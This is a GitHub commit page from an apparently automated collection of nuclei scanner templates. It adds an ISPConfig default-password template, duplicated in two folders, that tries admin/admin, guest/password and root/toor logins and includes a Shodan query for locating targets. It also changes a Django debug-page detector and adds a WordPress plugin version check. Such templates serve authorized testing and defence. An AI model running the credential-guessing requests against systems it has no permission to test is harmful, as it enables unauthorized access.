Skip to content

Commit

Permalink
20240825
Browse files Browse the repository at this point in the history
  • Loading branch information
actions-user committed Aug 25, 2024
1 parent eb5f600 commit 2eb80d1
Show file tree
Hide file tree
Showing 48 changed files with 1,811 additions and 479 deletions.
2 changes: 1 addition & 1 deletion date.txt
Original file line number Diff line number Diff line change
@@ -1 +1 @@
20240824
20240825
20 changes: 20 additions & 0 deletions poc.txt
Original file line number Diff line number Diff line change
Expand Up @@ -3345,6 +3345,7 @@
./poc/auth/iptime-default-login-8193.yaml
./poc/auth/iptime-default-login-8194.yaml
./poc/auth/iptime-default-login.yaml
./poc/auth/ispconfig-default-login.yaml
./poc/auth/issabel-login.yaml
./poc/auth/iubenda-cookie-law-solution-0f838161174c3a1452a42342cb556b62.yaml
./poc/auth/iubenda-cookie-law-solution-4353c7e138ff4cafc852aa03c1df2812.yaml
Expand Down Expand Up @@ -7432,6 +7433,7 @@
./poc/config/insecure-cors-configuration.yaml
./poc/config/insecure-network-security-config.yaml
./poc/config/insecure_transport_networksecurityconfig.yaml
./poc/config/ispconfig-default-login.yaml
./poc/config/ispconfig.yaml
./poc/config/joomla-config-dist-file.yaml
./poc/config/joomla-config-file-8374.yaml
Expand Down Expand Up @@ -23803,6 +23805,7 @@
./poc/cve/CVE-2023-0924-5f6349523fa3681f3fb3dddd26ea40cb.yaml
./poc/cve/CVE-2023-0924.yaml
./poc/cve/CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml
./poc/cve/CVE-2023-0926.yaml
./poc/cve/CVE-2023-0937-710621abe5c27a3f4d488a85b84e167f.yaml
./poc/cve/CVE-2023-0937.yaml
./poc/cve/CVE-2023-0940-68c8a812a7f4d3db6d4f04bb90d0d9a4.yaml
Expand Down Expand Up @@ -32365,6 +32368,7 @@
./poc/cve/CVE-2023-6986-40ce27a126a874a6f061b95c0f565f63.yaml
./poc/cve/CVE-2023-6986.yaml
./poc/cve/CVE-2023-6987-c1c87c85e30a10fc9ff9a903c209fbf6.yaml
./poc/cve/CVE-2023-6987.yaml
./poc/cve/CVE-2023-6988-159f07c88d3476750318c076d61454ef.yaml
./poc/cve/CVE-2023-6988.yaml
./poc/cve/CVE-2023-6989-f3e101de1aabc79baa4bde571ba04314.yaml
Expand Down Expand Up @@ -34365,6 +34369,7 @@
./poc/cve/CVE-2024-2253-e80d4914f56d0bcf3f9f3038bce09c0d.yaml
./poc/cve/CVE-2024-2253.yaml
./poc/cve/CVE-2024-2254-fff7de08f6116735e0400b319113ddc3.yaml
./poc/cve/CVE-2024-2254.yaml
./poc/cve/CVE-2024-2255-c91737673f0c0121f5550bad7a472ece.yaml
./poc/cve/CVE-2024-2255.yaml
./poc/cve/CVE-2024-2256-baa716bf2c82d44f12eb5944a7db627c.yaml
Expand Down Expand Up @@ -41689,6 +41694,7 @@
./poc/cve/CVE-2024-6491-077c7077f2470ec50c66a49785e52870.yaml
./poc/cve/CVE-2024-6491.yaml
./poc/cve/CVE-2024-6493-8ce30d589b40d67eb51efe70935d8bd9.yaml
./poc/cve/CVE-2024-6493.yaml
./poc/cve/CVE-2024-6494-1f03219d59ff7e715b118bf84690f350.yaml
./poc/cve/CVE-2024-6494.yaml
./poc/cve/CVE-2024-6495-7f7d4d9be9d13fb4035edaa3d3829c0a.yaml
Expand All @@ -41700,6 +41706,7 @@
./poc/cve/CVE-2024-6498-2ab2ecf188af29e491c09cc5e16d6c6a.yaml
./poc/cve/CVE-2024-6498.yaml
./poc/cve/CVE-2024-6499-506582290ab27969bbad70e6796d3810.yaml
./poc/cve/CVE-2024-6499.yaml
./poc/cve/CVE-2024-6500-76d6d82cf0d857f1f99bb5f0649b9e93.yaml
./poc/cve/CVE-2024-6500-e8578bf41793cff7e63bbe53d1903e0e.yaml
./poc/cve/CVE-2024-6500.yaml
Expand Down Expand Up @@ -41782,6 +41789,7 @@
./poc/cve/CVE-2024-6599-aa457f52df54a859bbebb756c962b901.yaml
./poc/cve/CVE-2024-6599.yaml
./poc/cve/CVE-2024-6617-861b78cb0bd74ebded540a2ef2369b65.yaml
./poc/cve/CVE-2024-6617.yaml
./poc/cve/CVE-2024-6621-02b2446a68489e575b652c2201b7d541.yaml
./poc/cve/CVE-2024-6621.yaml
./poc/cve/CVE-2024-6624-3e8f54a8f5a599fccb32276f2c459503.yaml
Expand All @@ -41793,6 +41801,7 @@
./poc/cve/CVE-2024-6629-d16f070910ae811c719a92ea7113c3c7.yaml
./poc/cve/CVE-2024-6629.yaml
./poc/cve/CVE-2024-6631-b90f42cd5d41e04b09c0aa755df89cc7.yaml
./poc/cve/CVE-2024-6631.yaml
./poc/cve/CVE-2024-6634-1294d62a2e83c6ca71566c3b267c34d2.yaml
./poc/cve/CVE-2024-6634.yaml
./poc/cve/CVE-2024-6635-0f3174f37f221bf395fa03e4aca4837b.yaml
Expand All @@ -41810,9 +41819,11 @@
./poc/cve/CVE-2024-6661-865ee81f979d667850ff2bc7887f6239.yaml
./poc/cve/CVE-2024-6661.yaml
./poc/cve/CVE-2024-6665-8c1223ca753362f23c9223b5d83c7625.yaml
./poc/cve/CVE-2024-6665.yaml
./poc/cve/CVE-2024-6666-f524b500b74a1c90be50f56d9d664783.yaml
./poc/cve/CVE-2024-6666.yaml
./poc/cve/CVE-2024-6667-4b06082c59fafdba7199d79388d0eff6.yaml
./poc/cve/CVE-2024-6667.yaml
./poc/cve/CVE-2024-6668-6a6e2b0e2761e93d3ce06e929012b06f.yaml
./poc/cve/CVE-2024-6668.yaml
./poc/cve/CVE-2024-6669-1f8f47157f2608b3fb02a0319a35eb1c.yaml
Expand Down Expand Up @@ -41999,6 +42010,7 @@
./poc/cve/CVE-2024-7350-fae9f5c8afaa9888e7d61c55abf3bb9e.yaml
./poc/cve/CVE-2024-7350.yaml
./poc/cve/CVE-2024-7351-93a2178394f4d78fbcc5b86f7c46b250.yaml
./poc/cve/CVE-2024-7351.yaml
./poc/cve/CVE-2024-7353-51d3774cc31ba9c09e3ef4a4a7c21d55.yaml
./poc/cve/CVE-2024-7353.yaml
./poc/cve/CVE-2024-7355-464a77ba558154888cf73a5cab0a6cc4.yaml
Expand Down Expand Up @@ -42054,6 +42066,7 @@
./poc/cve/CVE-2024-7561-dd941493ec03049c383c879de09e421d.yaml
./poc/cve/CVE-2024-7561.yaml
./poc/cve/CVE-2024-7568-03c9c97fbcce1159bd078f05cbf27da7.yaml
./poc/cve/CVE-2024-7568.yaml
./poc/cve/CVE-2024-7574-003dab2f041ca334b519548f81f66762.yaml
./poc/cve/CVE-2024-7574.yaml
./poc/cve/CVE-2024-7588-72d4c65f8b4a3c39e85f33895621e123.yaml
Expand All @@ -42080,6 +42093,7 @@
./poc/cve/CVE-2024-7651-7d4af77ba7202b412fee68fa25bbbec8.yaml
./poc/cve/CVE-2024-7651.yaml
./poc/cve/CVE-2024-7656-cc628b96623048172302ddea18aada71.yaml
./poc/cve/CVE-2024-7656.yaml
./poc/cve/CVE-2024-7689-f3a5e607572c3ebe82d6cfc65f846263.yaml
./poc/cve/CVE-2024-7689.yaml
./poc/cve/CVE-2024-7690-8d65eb5cdc8a149b1d94856146905574.yaml
Expand Down Expand Up @@ -42113,6 +42127,7 @@
./poc/cve/CVE-2024-7854-c405929374c8ffa2432434eb86f570c7.yaml
./poc/cve/CVE-2024-7854.yaml
./poc/cve/CVE-2024-8120-3613ebb9d30f84ec400bcf99e23d31d1.yaml
./poc/cve/CVE-2024-8120.yaml
./poc/cve/CVE_2023_49442.yaml
./poc/cve/CVE_2023_51467.yaml
./poc/cve/CVE_2024_0195.yaml
Expand Down Expand Up @@ -50374,6 +50389,7 @@
./poc/default/iptime-default-login-8193.yaml
./poc/default/iptime-default-login-8194.yaml
./poc/default/iptime-default-login.yaml
./poc/default/ispconfig-default-login.yaml
./poc/default/jboss-default-password.yaml
./poc/default/jboss-jbpm-default-login.yaml
./poc/default/jeedom-default-login.yaml
Expand Down Expand Up @@ -54147,6 +54163,7 @@
./poc/favicon/favicon-detection-7446.yaml
./poc/favicon/favicon-detection.yaml
./poc/favicon/favicon-generator-7c646439e38a1ba7bbbc75a1ac2635c5.yaml
./poc/favicon/favicon-generator.yaml
./poc/favicon/favicon-rotator-6f8bd28dbfbd78a39c26211650d54ded.yaml
./poc/favicon/favicon-rotator.yaml
./poc/favicon/favicon-switcher-87d4523b4710268d91b0abc72f0e31c5.yaml
Expand Down Expand Up @@ -55695,6 +55712,7 @@
./poc/header/header-footer-code-manager-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/header/header-footer-code-manager-plugin.yaml
./poc/header/header-footer-code-manager.yaml
./poc/header/header-footer-code.yaml
./poc/header/header-footer-elementor-13cbbdbbd61a4c045ef2ff7386dfb654.yaml
./poc/header/header-footer-elementor-13cd3c728a036abc42340e590babbe8b.yaml
./poc/header/header-footer-elementor-232faaa29b050dd09edb1a0a86fedae0.yaml
Expand Down Expand Up @@ -69420,6 +69438,7 @@
./poc/other/devrant.yaml
./poc/other/devto.yaml
./poc/other/devvn-image-hotspot-269eebf1ba30b97f68098501ab57b8df.yaml
./poc/other/devvn-image-hotspot.yaml
./poc/other/dexs-pm-system-868efdaccc5f16808a6fb06fe3a1cbec.yaml
./poc/other/dexs-pm-system-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/dexs-pm-system-f0982fd918eb9ba0d5bc8bd0faec3225.yaml
Expand Down Expand Up @@ -76884,6 +76903,7 @@
./poc/other/kbslider-plugin.yaml
./poc/other/kbslider.yaml
./poc/other/kbucket-213e255d0f7bbab0012e0bbbd474a0f3.yaml
./poc/other/kbucket.yaml
./poc/other/kd-coming-soon-2265a234dfded05f01d36b926bceb429.yaml
./poc/other/kd-coming-soon.yaml
./poc/other/kedacom-dvr接入网关.yaml
Expand Down
63 changes: 63 additions & 0 deletions poc/auth/ispconfig-default-login.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,63 @@
id: ispconfig-default-login

info:
name: ISPConfig - Default Password
author: pussycat0x
severity: high
description: |
ISPConfig Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security.
metadata:
verified: true
max-request: 9
shodan-query: "http.title:\"ispconfig\""
tags: default-login,ispconfig

http:
- raw:
- |
GET /login HTTP/1.1
Host: {{Hostname}}
- |
POST /login/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Origin: {{BaseURL}}
Connection: close
Referer: {{RootURL}}/login/
username={{username}}&password={{password}}&s_mod=login&s_pg=index
- |
GET /sites/web_vhost_domain_list.php HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Referer: {{RootURL}}/index.php
attack: pitchfork
payloads:
username:
- 'admin'
- 'guest'
- 'root'
password:
- 'admin'
- 'password'
- 'toor'

stop-at-first-match: true
host-redirects: true

matchers-condition: and
matchers:
- type: word
part: body_3
words:
- Tools
- Websites
condition: and

- type: status
status:
- 200
# digest: 4b0a004830460221008a28f1d5944e66f8110267e1ef972142f26ab267c802b3014d9e149936f59664022100848b98acb511571071b1ad550692d756860ad969ec7f53b87045972e9996492b:922c64590222798bb761d5b6d8e72950
63 changes: 63 additions & 0 deletions poc/config/ispconfig-default-login.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,63 @@
id: ispconfig-default-login

info:
name: ISPConfig - Default Password
author: pussycat0x
severity: high
description: |
ISPConfig Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security.
metadata:
verified: true
max-request: 9
shodan-query: "http.title:\"ispconfig\""
tags: default-login,ispconfig

http:
- raw:
- |
GET /login HTTP/1.1
Host: {{Hostname}}
- |
POST /login/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Origin: {{BaseURL}}
Connection: close
Referer: {{RootURL}}/login/
username={{username}}&password={{password}}&s_mod=login&s_pg=index
- |
GET /sites/web_vhost_domain_list.php HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Referer: {{RootURL}}/index.php
attack: pitchfork
payloads:
username:
- 'admin'
- 'guest'
- 'root'
password:
- 'admin'
- 'password'
- 'toor'

stop-at-first-match: true
host-redirects: true

matchers-condition: and
matchers:
- type: word
part: body_3
words:
- Tools
- Websites
condition: and

- type: status
status:
- 200
# digest: 4b0a004830460221008a28f1d5944e66f8110267e1ef972142f26ab267c802b3014d9e149936f59664022100848b98acb511571071b1ad550692d756860ad969ec7f53b87045972e9996492b:922c64590222798bb761d5b6d8e72950
18 changes: 9 additions & 9 deletions poc/cross_site_request_forgery/django-debug-exposure-csrf.yaml
Original file line number Diff line number Diff line change
@@ -1,25 +1,25 @@
id: django-debug-exposure

info:
name: Django Debug Exposure
author: geeknik
severity: high
reference:
- https://twitter.com/Alra3ees/status/1397660633928286208
author: shelled
severity: medium
tags: django,exposure

requests:
- method: POST
path:
- "{{BaseURL}}/admin/login/?next=/admin/"

matchers-condition: and
matchers:
- type: status
status:
- 500
- 403

- type: word
part: body
words:
- "DB_HOST"
- "DB_NAME"
- "DJANGO"
- "ADMIN_PASSWORD"
- 'seeing the help section of this page because you have <code>DEBUG ='
- 'True</code>'
condition: and
59 changes: 59 additions & 0 deletions poc/cve/CVE-2023-0926.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: CVE-2023-0926

info:
name: >
Custom Permalinks <= 2.6.0 - Authenticated(Editor+) Stored Cross-Site Scripting
author: topscoder
severity: low
description: >
The Custom Permalinks plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.6.0 due to insufficient input sanitization and output escaping on tag names. This allows authenticated users, with editor-level permissions or greater to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, even when 'unfiltered_html' has been disabled.
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/97f8549a-292d-4a6d-8ec0-550467e5cf0f?source=api-prod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
cvss-score: 4.4
cve-id: CVE-2023-0926
metadata:
fofa-query: "wp-content/plugins/custom-permalinks/"
google-query: inurl:"/wp-content/plugins/custom-permalinks/"
shodan-query: 'vuln:CVE-2023-0926'
tags: cve,wordpress,wp-plugin,custom-permalinks,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/custom-permalinks/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "custom-permalinks"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 2.6.0')
Loading

0 comments on commit 2eb80d1

Please sign in to comment.